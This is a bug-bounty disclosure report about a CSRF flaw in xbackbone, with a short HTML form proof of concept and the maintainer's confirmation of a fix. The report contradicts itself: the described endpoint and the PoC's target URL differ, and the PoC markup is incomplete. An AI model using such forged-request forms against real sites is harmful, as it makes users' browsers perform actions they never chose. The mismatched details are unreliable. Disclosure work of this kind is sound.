Cross-Site Request Forgery (CSRF) in sergix44/xbackbone


Reported on

Jul 30th 2021

✍️ Description

following endpoint vulnerable to CSRF: /omeka/system/deleteOrphanFiles Also there is not any different that you run The application in localhost or some real hosts, this is enough to login with a browser that used the browser for online web surfacing too.

🕵️‍♂️ Proof of Concept

// PoC.html

  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost:8000/omeka/upload/1/unpublish">
      <input type="submit" value="Submit request" />

💥 Impact

This vulnerability is capable of delete any Orphan Files.


We have contacted a member of the sergix44/xbackbone team and are waiting to hear back a year ago
a year ago


Hello Sergio Brighenti, how are you? I just want to sure you see this report too

a year ago


any problems?

Sergio Brighenti confirmed that a fix has been merged on 840208 a year ago
Sergio Brighenti has been awarded the fix bounty
to join this conversation